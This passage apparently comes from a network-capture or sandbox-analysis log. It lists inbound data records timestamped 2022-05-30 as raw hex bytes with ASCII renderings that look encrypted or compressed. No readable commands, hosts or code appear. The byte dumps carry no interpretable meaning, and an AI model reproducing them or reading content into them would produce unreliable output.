c9 72 93 Data Ascii: nPTh0{\%R[}zJwmVNvRVvID#;p9jURwvOZ2uBdmf8nCw(,d)x^oYv$ICHcPJ#A/G8\|a4u yHu2HB%djg5c!,8EQr
2022-05-30 12:45:59 UTC	754	IN	Data Raw: 17 3d f7 82 7f 46 3a 64 32 45 b0 fa 94 26 d3 10 dc 2a 40 5f ca 9e 1e ea 18 eb 10 2a 3c c4 ae f8 f7 8b ff 5b 8f 55 79 32 dd 9a a1 04 94 b4 84 1b 63 d8 b8 56 54 77 db fb ab 9b cd f3 48 6f 36 dd 9b a8 38 10 f3 fe 1c 4c 9c 1d 3b aa fa 84 a6 ad 2d 5a d0 e4 76 65 1c fe e4 b3 42 fb b4 e3 ec ba 7e e1 cb 8f a2 8c 21 5c eb 65 b9 37 b3 88 2c 54 e9 87 d3 ca 86 d1 5e 59 48 b9 ce 37 5e 3e bf 78 53 0a f5 85 b4 24 be f0 04 e2 c6 9f 90 03 89 26 9f 14 03 79 35 43 f9 d8 ed 03 02 f4 50 2e 41 05 05 e0 04 5d b1 5f 3c b7 ee e3 2f 91 38 15 82 87 e7 cb a7 5d 39 d5 47 6b dc b5 29 66 e1 fe 7d a7 a9 b5 9a 05 3d 46 21 56 3f 61 ab 51 e2 b0 3b 28 d9 15 e9 88 b9 cb 3c 61 32 7b e6 20 0d 3e b0 92 8f 80 a2 4a 79 a0 da 2d fe 8c 91 89 00 52 27 60 fa 08 af 6b 02 f4 20 ae 1e 3f 03 bc c9 d9 07 Data Ascii: =F:d2E&@_<[Uy2cVTwHo68L;-ZveB~!\e7,T^YH7^>xS$&y5CP.A]_</8]9Gk)f}=F!V?aQ;(<a2{ >Jy-R'`k ?
2022-05-30 12:45:59 UTC	755	IN	Data Raw: a2 b8 40 44 f5 6c 61 0b 81 bb ba cd e4 d7 40 d4 01 7d ae 6f 17 5b b9 bf 23 94 5e 6c f4 25 80 ce 6a f1 f8 4f 96 53 aa a2 b2 97 e6 8f da ac 59 74 04 cb 25 b8 50 ef d0 9a 5d f0 9b 84 0b 6a e2 2a 51 93 27 95 45 52 08 e9 9a 7c 61 a1 8b b4 76 21 8c 8b 37 82 38 1e c0 b4 c3 b8 e9 6c 42 f6 81 0c f5 1c 55 33 1b 68 cd b0 2c 28 87 48 cd e4 01 1b ab d5 c7 25 81 81 bd 00 55 44 2e 2f 0b 81 5a 11 d8 1b ea b1 a0 e5 8a b2 7c cf 8d 93 f1 42 28 9f 11 1d 6e 7a f4 8d ff 85 b0 08 c0 69 7a 15 56 3a cb 02 c4 ed 6a 63 fa 28 91 95 9e 61 a3 8c 94 46 61 5b 76 2b aa 56 56 13 2c 27 4a 8e b2 37 7a 59 1f a1 ea 50 fd 8f 30 14 7e 50 bb b7 63 d8 77 2d 2a 0e 0f 13 75 9d 64 24 3d d7 2f 4a b2 8c 97 d7 be ce 17 39 90 16 51 4a b2 74 58 ac 14 5f cd 0b 03 01 ad f1 33 86 01 8d 30 fa e5 d9 bc 2b e5 Data Ascii: @Dla@}o[#^l%jOSYt%P]jQ'ER\|av!78lBU3h,(H%UD./Z\|B(nzizV:jc(aFa[v+VV,'J7zYP0~Pcw-ud$=/J9QJtX_30+
2022-05-30 12:45:59 UTC	756	IN	Data Raw: 10 21 e3 5f 94 1b 02 b9 6a 77 04 df bc 96 78 f8 42 9e 89 dc f4 79 71 e1 3f 1f 22 81 14 17 ea 1e 1c 7f 31 ee 9d f0 6a b8 df 9e cc 9b ab c5 d9 f3 13 40 46 4b ec 43 4a 76 76 c4 d7 22 8b ca 49 be cd 92 87 f3 60 bc 8b be be 57 1d c1 85 c0 e0 e3 96 ca 1c d8 8f 7f 28 71 0f f3 3d 09 ca f5 b7 72 1e b5 a8 89 63 92 8f 7d 60 3c 75 c2 1d e0 59 10 b7 13 84 5e 37 b0 8d 4e 63 c5 6e 42 8e eb de cc 8a b4 d0 d0 bd fa 58 ba 88 0b 82 75 2a f9 22 7e 64 3a 3f dc 89 13 77 3c 6c 1f b5 95 ed cc 8d f5 2c 6f 70 11 eb b7 58 03 69 34 46 54 7e 62 3b d2 40 03 e8 2e 98 1e 54 c3 9a 2f bf 7f be 05 a9 13 0e 87 8a 5e c7 5c 13 d7 10 80 c6 a5 a8 8a af d1 c9 cf 80 1c 97 33 87 2b f6 d6 8d 84 42 be d7 e0 89 5c 12 24 e4 63 3a 7f 95 9e 86 b0 5b 48 a4 07 84 01 f4 ae 89 99 3b 44 dd 9c 13 38 a2 5c 61 Data Ascii: !_jwxByq?"1j@FKCJvv"I`W(q=rc}`<uY^7NcnBXu*"~d:?w<l,opXi4FT~b;@.T/^\3+B\$c:[H;D8\a
2022-05-30 12:45:59 UTC	758	IN	Data Raw: 42 c3 82 27 93 19 d4 4e a7 12 21 ad 62 2d 62 53 d2 76 8e 08 ea 92 2e cd 70 38 c8 f8 fd 0a eb 40 41 96 03 0b f4 61 18 5d 0d 7d b2 8c f4 4d f3 de 9d 45 5a a1 87 04 be 46 b8 ee 70 34 80 77 29 1b db 0a f9 2a 56 38 60 3e 4f 1a ec f5 73 93 03 75 41 22 b9 3e d8 e4 80 c6 e4 e5 0f d6 05 af e8 20 21 b5 3a 1f 04 e1 73 f2 39 92 eb 7a ec db ed f9 ae 02 d6 57 dd d9 49 6b a9 9c 5a e0 2e e4 4d 47 c3 40 cb bf a9 45 e6 77 20 b7 e7 87 4a 36 ef 17 9e 88 0d 3c 77 b7 84 93 d7 4d b0 60 92 ce 5e 65 5d b7 64 4d 6c c6 73 78 f6 3b 94 b9 e2 0e 5e 6e 17 35 cc c9 13 1f 3f 03 07 ca 34 73 78 b8 30 10 02 56 9f 28 3c 99 4d 1b 51 74 d8 ce 16 1d 00 49 5b bb 23 75 bd 0e fa 3d 0c 8f 4f 24 a7 17 6c b2 3c eb 0a 1f a9 00 0d 5c 2b 9f 10 f4 f4 18 53 a6 b8 3a c3 32 20 07 53 66 03 ae 42 88 89 b6 f4 Data Ascii: B'N!b-bSv.p8@Aa]}MEZFp4w)*V8`>OsuA"> !:s9zWIkZ.MG@Ew J6<wM`^e]dMlsx;^n5?4sx0V(<MQtI[#u=O$l<\+S:2 SfB
2022-05-30 12:45:59 UTC	759	IN	Data Raw: 91 0a 30 07 58 90 82 da 26 e5 b7 3c 88 85 f6 d6 01 c9 2b 52 e3 a0 fa cd 18 f5 b7 4b 42 b9 2f 2b b0 de c5 03 fd a3 5e 78 67 97 ed 62 c7 ff 16 4c e3 4d 04 06 13 2c 6b 1a ce 42 6d ef f9 2f 6c 81 82 e9 d9 9c 7a 51 f0 99 7c 75 3b 13 e7 8f 5e e0 55 03 d3 64 b8 b0 c5 29 89 2d 74 a0 3c a0 41 34 ce 3e 06 33 3c 28 6a fe 53 a2 cc 07 00 61 20 70 0f 7a 2b 9f 2f c6 e3 3a 23 a5 52 85 eb 94 7d 7d 58 d5 c9 38 99 89 72 9b 42 2a 5f 1a fc 9b 80 67 1e f1 b0 e7 93 fd d4 3c 88 b2 75 c9 20 98 98 17 97 21 e9 ae 90 ce c7 ee a4 33 b4 2c 4c 6f 9f 79 74 bc f0 52 8f 9a af 53 9f 1f 17 91 e2 8c 63 77 8b 54 56 67 27 eb 44 9b 6b 05 34 78 cc 85 f8 bf 23 ae b3 be eb 24 15 b7 ab 9b 81 ee 79 89 04 de 18 e5 fe 0b 5c ed 4c 9b 36 db 94 30 72 5c 17 18 dd 4e 2c 57 c1 12 12 de 5c 38 fe f2 a6 13 90 Data Ascii: 0X&<+RKB/+^xgbLM,kBm/lzQ\|u;^Ud)-t<A4>3<(jSa pz+/:#R}}X8rB*_g<u !3,LoytRScwTVg'Dk4x#$y\L60r\N,W\8
2022-05-30 12:45:59 UTC	760	IN	Data Raw: ff 0a 59 cc f2 41 ce 53 84 68 4d a5 03 2e 5e 0f aa 35 18 b6 71 f1 fd 49 da ea 3a 56 8c 64 b6 57 4e b5 64 83 2d 43 50 01 f1 1d 48 49 fc 20 20 58 51 36 91 8c e8 a7 e9 32 d8 33 d7 71 34 fe 7f 45 d9 75 bc 58 b9 0b 99 7b 15 63 93 57 a2 af 77 47 c1 6e 4b 63 3c 5f 17 0e 62 07 8d 8f f2 69 ea 39 62 6f 05 b1 c8 ed 2e 18 37 5b bb f6 98 0b a4 fc 76 f6 06 6f c3 30 86 17 51 d4 91 8b 5f f0 ca 41 15 5e 54 88 e4 58 7f 49 88 5a 33 62 d5 cf 8a 58 59 50 3a a6 e6 e5 d3 a1 e5 c6 ec 95 70 ea d2 de af 08 c5 29 50 a9 9e be cc 68 40 59 f1 77 e3 e6 45 1c 6b e3 d3 25 98 49 b3 5d 50 8c ee c5 0a 3b 9b 22 74 88 98 73 da 1c f6 a6 dd 32 f3 08 e2 fd 78 ee c7 bd 05 5b 00 9d 7f 32 fd ae 10 ac 2f ce db ae 4a d3 ee 2f 88 a7 52 e7 65 b4 cc 85 a4 72 1f 3b 50 46 b4 76 25 64 8b 86 01 c8 5e 49 30 Data Ascii: YAShM.^5qI:VdWNd-CPHI XQ623q4EuX{cWwGnKc<_bi9bo.7[vo0Q_A^TXIZ3bXYP:p)Ph@YwEk%I]P;"ts2x[2/J/Rer;PFv%d^I0
2022-05-30 12:45:59 UTC	761	IN	Data Raw: ca 8f 3a f8 4e 68 6d 4b 75 d8 68 02 4c 73 dd 46 78 39 ed 80 c6 64 86 2e c1 3b 24 6f 2e d8 70 09 3a b0 1a 83 a2 fe 9a 40 fc 5f 38 49 9b 65 f7 64 a8 ed 1c c0 65 66 d7 94 13 47 28 54 11 48 c5 bc 6b e1 1f e1 3f d4 3a 86 16 4a 2e 54 d1 31 cd 4e 38 fc 38 5e 19 37 aa 15 44 a5 44 7a 7c f8 f2 a0 bf 54 44 87 90 f5 3b 94 ba 76 d4 a7 a0 d2 76 fd 66 31 53 d7 86 ab 34 f7 3e a7 79 20 19 0a f3 74 c8 6c 21 c4 46 b5 74 dc d9 16 5d 47 c2 90 fa d2 03 17 e9 70 e8 59 56 b8 d6 26 59 69 3d 41 2f 7f 37 22 42 9f 70 83 27 65 e9 13 4a 16 69 1f 30 a6 ca 41 17 8c 1c 03 17 11 15 8b 3d a6 f0 1f 44 92 6c 7e 4f b5 bf 94 89 3b 7f 2b 26 d0 0a a3 d5 a5 51 bd 10 87 fd ab d0 c0 82 8e 75 6a c4 39 0a cc ff 91 01 72 e1 39 48 7d 90 7a d9 4c 3a 96 28 b1 9d 5c 80 e8 08 59 88 83 58 dc bc ce 18 90 8a Data Ascii: :NhmKuhLsFx9d.;$o.p:@_8IedefG(THk?:J.T1N88^7DDz\|TD;vvf1S4>y tl!Ft]GpYV&Yi=A/7"Bp'eJi0A=Dl~O;+&Quj9r9H}zL:(\YX
2022-05-30 12:45:59 UTC	763	IN	Data Raw: 01 bb 2e 0c 4b 7a 01 b9 5c a9 0e 1b 54 fb 95 f1 75 11 c4 b7 4f da ad ee ad 3c a0 41 30 fe a8 e8 ca a6 3c 97 76 94 9e 33 59 52 0b ac 60 fc ff 2e c4 91 31 72 1d dc d1 4e 9a da db 92 a3 53 b1 9f b3 ec 0a 25 9c 3c ae d2 5b b6 36 99 44 57 81 11 a5 ed 15 bc 47 38 b3 74 da 54 2f 6b 27 c7 5f 6b 55 42 8f 8f cf 0c 9a bb 78 47 0f b7 15 33 b8 79 03 6c ec f1 e4 fd f8 2a e5 9e 1d f4 1b 7d ed 5e 6e fc 70 45 89 08 31 ee 04 93 12 fb a9 23 53 80 96 30 d6 b7 8b a3 ac 2b 8c cc 0b e8 ce c0 f3 a5 a7 1a 2e be b3 b6 e5 e0 0c 08 cc ff b2 76 c3 e2 e2 42 e4 4e 82 16 95 fa 21 9a 6c 11 18 0e da 43 b5 9e 10 31 4f 1f 73 0b d9 52 8c 8f 2c 7d 3a b7 c8 63 7d 9f 73 44 bf d2 b9 d9 69 f3 4e 61 76 0a de 68 cb f8 18 3a e3 f3 9c 74 67 ff aa df 96 36 0d 3d f6 53 93 68 b2 61 58 86 8d dd 2b 83 c6 Data Ascii: .Kz\TuO<A0<v3YR`.1rNS%<[6DWG8tT/k'_kUBxG3yl*}^npE1#S0+.vBN!lC1OsR,}:c}sDiNavh:tg6=ShaX+
2022-05-30 12:45:59 UTC	763	IN	Data Raw: 5d c5 0b 65 0a 76 bb 37 f0 9d 2b 64 90 3b a6 c6 73 71 8d da c7 67 58 42 0e 95 70 53 73 e3 01 a8 de 01 8f 17 7a 6e 1f c1 4e 28 14 83 db 6c dd 05 5b 00 65 c4 b7 bf da 12 2b da 34 48 c8 03 11 91 b7 f5 56 17 c5 8a 11 e3 24 17 fe 9e 52 b5 c7 9e cb 00 79 2e 70 96 99 7e 88 8e 49 9c 4a 28 a7 3d f5 b0 07 83 4f 14 64 a5 2a 7c 42 5b f9 c5 9c 6b d5 18 91 bf d2 3e cb ac fe a7 f3 be 63 8a 00 67 63 71 36 03 60 ef 2e d8 17 5a b4 29 57 18 e4 4e 86 ab ed 89 24 e2 a4 bd a1 36 69 ef 6b 75 01 65 47 61 5d 5e cd 7c f6 54 e1 f2 2b bd 8d bd 70 f9 4c 23 b3 db 17 b4 d7 ac 95 28 df fd 24 21 e6 bd 0d 2d 7b 65 da 8c 4e 90 f8 77 86 27 ab 9a 19 52 4c 08 99 66 27 2e 62 a5 d2 89 10 04 ea 92 2a 61 52 cb eb 18 52 88 12 bf 3d d1 cb a4 57 b7 3b 32 2f 65 8d f9 06 be bc 70 97 76 9a 22 c5 c2 6c Data Ascii: ]ev7+d;sqgXBpSsznN(l[e+4HV$Ry.p~IJ(=Od\|B[k>cgcq6`.Z)WN$6ikueGa]^\|T+pL#($!-{eNw'RLf'.baRR=W;2/epv"l
2022-05-30 12:45:59 UTC	765	IN	Data Raw: 65 64 fc eb 1c 85 00 d2 1f 1f 14 0c 97 55 25 bf d6 7d f7 df 6e ae 62 db 3f 54 40 4c 40 7e 11 06 a3 d8 0a c6 67 a3 7d ed 6e e4 b0 28 b9 7f 92 d7 d7 e0 c3 2a 1b 98 9b 1f 9f 8e f7 80 e7 f9 17 60 b9 e4 e2 af e2 5d 93 3e 7c 3b 37 9e fc 9a e0 82 13 68 3d 89 85 21 03 ad 13 ff 1d bb fb e4 1d ed 3f 6e af ce 0d 02 13 27 07 64 d9 8a cc 90 e9 14 82 ea 9f b9 32 74 ee b2 89 32 b9 14 29 03 32 0f 04 9a 42 5b 60 aa be 1d 84 e0 84 f7 5f b9 91 08 ba e0 6a ca cf ff 35 29 50 0b 39 c8 0a 29 a2 51 6e 31 06 61 4f 68 94 b1 e6 32 f3 82 69 d1 b6 5e fb c9 79 ca 9b f1 ba 32 08 da 14 e9 c5 db fb 1c 5a d7 6a ee d2 2c 1f 1f a1 18 cf 8a d9 65 08 d3 46 a7 c0 b0 90 03 0c 8b a9 00 18 49 3f 0c c4 cd 4f 4a 9b c0 89 bf 9c 94 fc 4d a5 43 7f 2b f6 76 7e e2 44 b6 a9 64 8b 9c 2d a0 d0 f5 73 21 54 Data Ascii: edU%}nb?T@L@~g}n(*`]>\|;7h=!?n'd2t2)2B[`_j5)P9)Qn1aOh2i^y2Zj,eFI?OJMC+v~Dd-s!T
2022-05-30 12:45:59 UTC	766	IN	Data Raw: 02 85 79 c6 9e e3 59 90 be a0 bc 21 d7 6c 57 65 18 5d 2e 9d 51 17 7b ea 49 43 55 40 1d c2 9d 37 d0 2b f0 a2 98 a5 4e 36 31 dc d7 9f e5 02 c3 88 b1 5b e6 23 b1 ea 3a 7d ce 0a 51 e3 ee 0c b2 93 01 f0 aa fa b0 6c d8 0f f6 66 d4 68 03 cc df 47 f6 35 03 54 41 79 3f 4d 50 40 63 89 3d dd a7 ba 41 b6 73 b5 ff 85 90 fe b2 48 b6 2d 7d d7 fc 00 94 7e 9e e3 61 cf d6 a5 63 69 da 96 11 81 c8 a1 09 05 64 67 12 9b 16 df c1 83 0c cc 55 60 de e0 09 f7 c4 f4 3e c1 65 77 c3 ec 1c 08 0f 91 b0 2c e4 f8 af 2a 65 3b 7f e3 26 d6 b5 6a 3d f6 68 be 10 ed 48 29 b9 4b 21 82 c2 aa 7c dc 33 70 bb 92 cd 7a fa ca c3 28 13 31 18 4f 5d d2 d4 be 31 17 64 5e c6 5e c2 39 a6 76 85 fa 12 05 7e f1 2f 7f 1c ca f1 f2 fb ce 9d 56 fd e2 c7 e7 31 ed f0 4b 85 1a 9b 3a 17 8c 6e d3 1c a5 df 8a 4e 63 d1 Data Ascii: yY!lWe].Q{ICU@7+N61[#:}QlfhG5TAy?MP@c=AsH-}~acidgU`>ew,*e;&j=hH)K!\|3pz(1O]1d^^9v~/V1K:nNc
2022-05-30 12:45:59 UTC	767	IN	Data Raw: d4 54 cc 74 1b cc 27 ba 61 ad 36 03 09 da 97 76 6a a1 7b d3 72 06 3e fa 5a 82 4e dc 11 47 d5 e3 a9 30 76 9f 63 d4 7b 32 2a 45 a9 10 dc 4f 0a 9b 64 f6 5c 2f 9b 14 a2 7c ab 9c 0d f3 c1 cd 37 c6 5e 55 c0 f9 89 44 6b 44 05 aa 96 3d 90 d3 b4 a4 99 a7 6a ce 16 31 7c 12 81 16 fd 0f 49 a2 57 ad 72 f9 71 8c 2d c6 e1 3c 1a 32 cf 2c 86 44 30 b4 26 1c 2e 27 0a b5 84 cc 98 62 d1 bb 64 94 57 7a ff 7f 7c 63 59 e2 fc 25 1e a6 16 85 89 c1 1d da dd 76 d6 40 94 d6 72 e6 d8 05 24 58 3d 17 70 ba 14 dc 05 c3 4d d2 f1 4a 80 fe e7 a7 71 ca 5e 41 b7 ca b2 8f ce 97 32 12 22 f5 3c 21 31 b2 62 86 b8 fd 93 08 9f be 52 eb 6e 2b ff ee c9 48 e8 b3 d4 16 93 8d 79 59 c8 46 5a 9d ed e6 c9 b0 cc 8b c5 ac 92 99 e7 1c 8d 4f d7 f5 db 72 79 45 3f 60 e2 68 ea d8 60 01 f7 90 94 54 f4 c3 2e 55 fc Data Ascii: Tt'a6vj{r>ZNG0vc{2*EOd\/\|7^UDkD=j1\|IWrq-<2,D0&.'bdWz\|cY%v@r$X=pMJq^A2"<!1bRn+HyYFZOryE?`h`T.U
2022-05-30 12:45:59 UTC	769	IN	Data Raw: 2a 1b e7 98 4c 39 0d a6 37 26 aa c7 82 bc 68 93 c8 18 cb 6c 10 a0 7a f1 84 70 46 de e4 f7 b7 12 42 3b 2d 1c 53 fc 32 74 20 75 6f e0 a6 3f ab 28 32 d1 be cf 44 cf 4d c3 9e d2 74 24 0f 3d 9a c1 26 14 51 cc 1c 92 67 47 a2 d3 5c 63 38 b9 80 b4 70 c5 0a 85 d2 fa f8 fd 3a 00 28 a2 d2 14 88 12 80 24 63 37 8d 51 15 d1 2f ba 14 9c 10 41 36 f0 e3 ff 73 1e 2d 08 67 64 27 1e d3 bb 33 4a db 3f 62 e5 ad 9b 93 98 18 20 cb 25 56 3b e0 61 74 87 31 ac 44 cc ca 70 08 87 b5 69 a9 24 2c 3e ea 37 38 5c 55 ca 11 1c 98 93 9f 36 ab 2a 5c 3c 48 54 e9 21 a2 d5 44 6c 3a eb bf ac fa 07 fb c8 67 83 13 fd d0 93 e3 82 14 d8 cc bd e8 0f 66 34 ae bd f7 4f 4f 9e 2c 84 80 9b 74 84 b0 80 47 ac 45 d4 5f 43 9d c2 f4 1e 11 9a f9 3d d5 56 fe 26 1f 4f cb 0a 6c ad 36 fc f5 ab d3 5d 28 fb 5f d8 d1 Data Ascii: L97&hlzpFB;-S2t uo?(2DMt$=&QgG\c8p:($c7Q/A6s-gd'3J?b %V;at1Dpi$,>78\U6\<HT!Dl:gf4OO,tGE_C=V&Ol6](_
2022-05-30 12:45:59 UTC	770	IN	Data Raw: aa 26 e4 f5 37 12 c7 9e cd 02 c1 2f e4 dd 3c c3 57 81 f1 38 a5 b9 ad 19 a9 2e 40 b8 a9 a9 a2 49 9d ca 6c f7 53 d5 20 46 8b 31 91 f3 b0 37 16 6e 6c 6c 21 2d aa 3a be 54 c8 bd 80 8d a2 fe fa 8c 71 91 3d 38 7a 45 b8 a3 44 4b ec 6a 1c 3c 73 8b d9 b9 e6 db 89 d0 fb 9a f5 f3 61 16 fb e0 f4 b5 1a 32 03 e6 2b 55 2e 98 0c 32 6f 23 f9 76 e2 e5 cf 76 67 06 81 30 a5 1f 2b 55 b5 a4 4b 30 f6 f4 0c a5 27 8c 32 b9 05 e8 23 26 b1 68 74 e2 6e 14 65 65 c9 f8 e3 33 c5 c2 80 7c 75 72 01 7a 0d c7 05 9c 69 7a 85 76 86 e0 1f 97 fc f4 85 dd e6 ed 10 4d 6f 9c 57 09 70 dd 9f a1 6e 21 1f 0f 29 30 0c 0f f3 b7 1d 13 13 b3 4b 76 e8 16 71 ba 0a 68 a1 72 32 f9 d9 9f 83 72 57 cf 4c 14 4c 80 b2 7d 88 b7 0f 60 87 df 92 f5 b4 59 c9 64 4c ac d5 36 a0 b6 d4 9b 18 db b4 c2 6e 48 65 8a 4b 9c 6c Data Ascii: &7/<W8.@IlS F17nll!-:Tq=8zEDKj<sa2+U.2o#vvg0+UK0'2#&htnee3\|urzizvMoWpn!)0Kvqhr2rWLL}`YdL6nHeKl
2022-05-30 12:45:59 UTC	771	IN	Data Raw: 99 aa 4b 1f 4e cc fb b5 32 02 63 54 06 dc 24 f4 c1 36 e4 7c 12 a7 08 21 1d 11 5e 31 87 d4 ce 7c fc 49 1e 87 c3 3d 8f b2 51 ab 30 af bb 44 fe cb c4 43 18 08 33 cc 20 da 4e e1 d6 5c ec f2 9d b0 e2 70 d3 70 91 c4 32 16 ce 0a 83 02 40 cd 76 de 16 04 71 b4 75 95 41 c3 36 b1 c7 2c 17 44 9e 0e 68 aa ca db 1b a4 e4 d6 18 b9 ca e5 0a 56 1b 31 c8 2a 54 c6 a2 a1 72 eb 68 6f 33 9f 78 b0 7e af 7d f3 d8 0b 72 fa 8c 1b f7 47 a1 e5 ec 75 53 12 01 f6 71 dd 46 7a 3a 6d d7 79 14 32 ed ca 11 76 56 e8 dc a1 b0 be 74 ef b1 79 c6 91 eb 46 ec d7 a2 d9 63 32 90 57 ee 9f 22 ae d4 d5 97 0e a4 a9 e2 ae 48 35 c3 e8 d0 37 b2 1e af 68 72 8d cd 3e 84 ca 07 e2 49 3c fc c0 fa 08 48 5a 14 4f 0b 3e 26 8a 47 09 17 af e3 a5 36 6e 90 34 cd ae 80 1d fd 52 97 3d 30 e0 bb de 3c c3 32 4e da 60 46 Data Ascii: KN2cT$6\|!^1\|I=Q0DC3 N\pp2@vquA6,DhV1*Trho3x~}rGuSqFz:my2vVtyFc2W"H57hr>I<HZO>&G6n4R=0<2N`F
2022-05-30 12:45:59 UTC	772	IN	Data Raw: 64 4b 1f 2d c9 6f 00 48 cf ae 1f 15 1f be b8 86 8f e3 b6 5d b4 1a f2 66 64 dd 42 7d 09 f5 22 1d d9 44 4c b9 2f 74 a7 38 eb 74 05 0c 1d 7c 8d 4b 24 ba 00 ac f6 15 04 a4 bb ad cc ac e3 a9 e0 9d b2 92 91 42 29 09 9c 4b c4 e5 97 58 3f f4 d9 77 ff f9 56 ba 5c be 6c c3 3c be b9 55 27 0b 0e 42 41 5b 29 ee 0b 4a ce 65 76 0e 3d 4a 7e 16 7f 61 ce 07 51 9d d0 f5 73 21 54 a9 48 c8 c0 dc d7 3c b3 bd 07 a0 ab 62 55 0b fb 98 08 18 ae 89 62 3a 76 57 65 7e 64 ff 81 d2 9a 42 89 45 5f da 34 93 0b a7 b9 e7 e6 71 19 5c 4c fc 19 fb 45 7a e4 e8 e0 de 3a 84 56 c1 f4 6b 8c 7b 1b 1f f7 44 66 4f 7d 1e 5b 74 61 5b ef fa 25 16 65 7f 51 dd 48 67 00 8a ff d5 fe 6c fe 3c c3 0c c8 94 00 d2 df 6d 58 ef 17 97 9b 1c 29 27 28 ef 6d 24 e8 0c 4b 5c dc 34 3e 33 81 d1 f9 d3 22 e7 c1 42 d4 99 db Data Ascii: dK-oH]fdB}"DL/t8t\|K$B)KX?wV\l<U'BA[)Jev=J~aQs!TH<bUb:vWe~dBE_4q\LEz:Vk{DfO}[ta[%eQHgl<mX)'(m$K\4>3"B
2022-05-30 12:45:59 UTC	774	IN	Data Raw: 62 59 42 83 69 af 98 93 cd 37 03 ff fc 00 69 c9 d3 85 5e bc f4 3c 01 a9 0a 53 3a 07 b8 ea 83 cc 80 24 26 37 06 04 c3 e0 28 b1 10 66 88 e2 49 f3 ab bf b2 55 b8 98 f0 31 02 c7 49 15 2f 25 cf a3 dd fa 52 47 4e 5a 91 46 b8 d1 70 ec 08 5d 53 39 d5 11 d8 8f 6f 28 66 e3 d4 3d e3 89 52 af b1 10 8a 8a 3a 11 85 63 f7 14 8d 8a 0f 55 57 94 54 88 cd 40 9b f3 5e f8 b7 17 2e cc 89 93 b4 14 c3 a2 a4 8f 96 75 37 5e b9 cc 99 ec b6 a5 ec 3e b4 22 3a 1c 84 5b 78 73 48 2c 90 5e 16 52 91 4e 77 65 3f 93 1b 08 da 6e ce af 83 8e 1a 4c c6 58 61 4d fc 16 a5 7d 12 1c 48 ee 3a 7c 10 2f 4e af c9 13 e7 0c d8 90 3f 14 a6 66 79 c4 e5 15 03 e8 d9 42 db 1b 1f db fa 8a d2 d4 2f fe bb 1d 58 a0 c3 d7 6b 8b cc b8 47 a3 bb f7 7b 17 75 1d cf 62 b4 fc c2 7e 4b ec 55 68 62 26 64 1a 81 e4 05 3a 72 Data Ascii: bYBi7i^<S:$&7(fIU1I/%RGNZFp]S9o(f=R:cUWT@^.u7^>":[xsH,^RNwe?nLXaM}H:\|/N?fyB/XkG{ub~KUhb&d:r
2022-05-30 12:45:59 UTC	775	IN	Data Raw: 84 35 5d a2 6c b5 a6 d3 61 36 66 38 d7 75 d1 99 89 9a 45 9c 92 c2 b9 72 7c 17 65 5e 31 de d0 7b 14 0f f4 3c 6d 93 cd d2 bb 86 8d fb bd cd 30 e2 4a db 5f 7c 74 13 6f 47 9c 2e 57 2d ea 80 0c 81 fc 69 93 49 fb 01 81 28 6e 26 e6 ea d5 eb ff 04 39 b6 06 de 2a c5 3a 1a f2 12 35 12 55 6b e8 de b6 ef 3a 8f fa da 7c 2e 28 0a 69 90 6e 1e d3 64 5a de 3e 10 e3 03 a5 aa 42 9c 1c 24 45 95 b0 44 85 85 e8 11 fd 63 bb a1 34 34 b1 4a 39 57 a2 7b ae b8 c7 88 cd f0 3e 91 20 ce 3a 63 67 97 47 49 f9 b4 eb a0 c1 9a c3 f7 3b 94 06 41 ed 2a 5e 1f 3a ba 6d 5c 27 a7 7b e0 07 f2 f7 22 93 cb 16 81 f7 23 83 dc 20 89 a2 88 0f dc 53 16 a7 a0 c8 29 16 0a fc e8 e9 f4 a9 1c a6 cf 5e 5e 8a 94 32 c7 e5 fb 8b 22 c1 fa 83 34 5d 35 16 09 fa 3d 1c 47 3c 23 3d 4c f0 7c 99 fc e4 07 76 d9 e5 0b e1 Data Ascii: 5]la6f8uEr\|e^1{<m0J_\|toG.W-iI(n&9:5Uk:\|.(indZ>B$EDc44J9W{> :cgGI;A^:m\'{"# S)^^2"4]5=G<#=L\|v
2022-05-30 12:45:59 UTC	776	IN	Data Raw: 3e 3f 8b 2d 8a 72 da a2 3c b8 03 9f 77 8b 4b 51 43 a5 c2 f0 40 74 e1 69 83 b2 46 81 34 21 00 01 23 4e 7f a8 2c 71 fc e0 37 49 16 a9 6a 58 96 a7 cf 8c 77 7c 1e 74 db 8f 89 ef d1 d9 91 91 bb 0b 25 26 9c a2 80 f0 99 7c 82 e1 8e 6e fc ea d3 7b f5 93 8b 32 c3 94 ab e8 62 2b 50 bf 64 ce 71 2e 1b ae 71 ad 23 1e b3 4f 5e c4 66 03 a9 a2 80 46 75 d5 4f 62 ee 87 cd 54 03 f4 4d 98 4f d4 d7 c6 a1 de f6 ec 04 e5 63 32 ce 4d f8 c3 8c 0e 04 e0 42 94 46 94 3c 3c 6c c8 e8 75 2d 20 b7 75 9e 02 67 e9 02 9a 25 2b 43 b3 5d 96 f3 b4 90 d4 0f 67 33 95 d7 ea d0 f4 87 9c 4a 51 c1 68 c9 00 ff e5 ef a1 f6 a2 3d 31 83 83 f7 d6 78 d8 3f ae fe 49 93 e0 dd 40 db 09 ca 28 53 f7 42 d4 d1 5d 5b 53 d1 bd 63 ac 42 c6 f8 0e 4c d4 b5 7d eb 8f 7f e4 16 a5 1d 5d 58 da 9f 62 eb c7 ae a1 5a 15 92 Data Ascii: >?-r<wKQC@tiF4!#N,q7IjXw\|t%&\|n{2b+Pdq.q#O^fFuObTMOc2MBF<<lu- ug%+C]g3JQh=1x?I@(SB][ScBL}]XbZ
2022-05-30 12:45:59 UTC	777	IN	Data Raw: f5 4e 58 2b eb ba 78 d9 88 4d a5 03 c6 2b e2 00 41 77 2e 05 0f 27 47 ea 76 ac 98 92 a8 a7 84 46 16 d4 2a 6c 61 09 62 67 f5 e1 e0 d3 8c 62 58 51 b5 6d b3 5a de 7d cc 94 d3 68 d1 10 75 b3 16 38 69 d4 58 32 95 99 54 15 2c 5f dd b9 8d 4f af c6 c2 d6 f9 aa d5 e4 d5 45 4b 80 48 6c 1d 7a c2 e9 13 eb 8f 7f 22 6f 23 31 d9 39 83 8f a9 82 e9 5a fe 87 9b 17 ee b9 6f cd b2 95 00 8d 9f cf fc 9e 15 17 cd 97 53 c0 4f ec 39 c3 2a 5a 67 c6 5a 59 50 ba 72 d6 0e a5 01 ee c6 e5 99 12 6d 9d cd 24 d7 ff d5 01 aa bc 25 4e 15 77 db 88 0a 0f 31 ba 08 c3 36 9c c2 96 01 26 27 de 73 0c b1 b4 d0 71 cb 20 32 ed 80 f6 ed 3e 3a 84 4e ca ff 5a 4c 64 c6 e0 0d 8f 02 fe 75 77 cc 